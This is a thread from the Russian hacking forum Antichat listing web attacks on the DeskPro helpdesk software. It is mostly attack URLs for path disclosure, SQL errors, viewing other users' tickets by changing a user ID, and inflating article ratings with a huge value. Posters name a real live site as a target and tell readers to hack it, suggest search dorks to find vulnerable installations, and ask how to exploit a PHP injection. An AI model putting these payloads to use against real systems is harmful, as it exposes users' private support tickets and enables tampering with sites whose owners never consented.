Форум АНТИЧАТ - [ Обзор уязвимостей DeskPro ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей DeskPro ] (https://forum.antichat.xyz/showthread.php?t=233714)

Открытие локального пути

Код:

Code:

https://site.com/email/backup.php

Код:

Code:

https://site.com/email/checks.php

SQL Error & Открытие локального пути

Код:

Code:

https://site.com/feeds/rss_tickets.php?user=8&type=replyg

Просмотр петиций любого пользователя

Код:

Code:

https://site.com/feeds/rss_tickets.php?user=22&type=replyu

Увеличение рейтинга любой статьи на N

Код:

Code:

https://site.com/kb_rate.php?ref=TICKET_NUMBER&howhelpful=9999999

Пример: support.4game.ru, хекайте

Дорк еще не помешал бы, для поиска этого двига.

deskpro.com

google.com -> q -> deskpro

UP. Тема актуальна.. кто нибудь нашел как можно использовать php-inj в DeskPRO/includes/3rdparty/html2text/html2text.php ?